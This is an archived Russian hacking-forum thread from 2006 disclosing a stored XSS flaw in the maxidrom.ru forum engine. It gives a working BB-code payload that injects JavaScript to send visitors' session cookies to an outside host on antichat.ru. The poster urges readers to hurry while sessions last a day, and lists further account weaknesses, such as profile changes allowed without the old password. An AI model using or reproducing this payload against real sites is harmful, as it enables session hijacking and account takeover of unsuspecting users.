ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу maxidrom.ru/forum/ активная XSS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

maxidrom.ru/forum/ активная XSS
  #1  
Старый 30.05.2006, 01:23
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию maxidrom.ru/forum/ активная XSS
Обнаружена активная хсс в движке Максидрома. Нет проверки спаренных ВВ-тегов:

PHP код:
[email]re@re[url=http://www.re.com'='][/url].com[/email] ' style='background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)' 
В опере не пашет, в FF не проверял.
Время сессии - сутки. Торопитесь =]


Пара коментов:
- отутствеует всякая проверка на регистрацию
- отсутствует ретрив пароля на мыло(если забыл - твои проблемы)
- можно сменить ЛЮБЫЕ данные в профиле БЕЗ ввода старого пароля, для смены пароля нужно знать старый

Последний раз редактировалось Elekt; 30.05.2006 в 01:25..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss черви и вирусы: сообщества уязвимых Utochka Чужие Статьи 3 28.08.2006 00:26
Xss — основные ходы dinar_007 Чужие Статьи 11 30.05.2006 17:00
Имеем аккаунт на sitecity.ru (активная XSS) _kREveDKo_ Уязвимости 2 30.05.2006 00:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ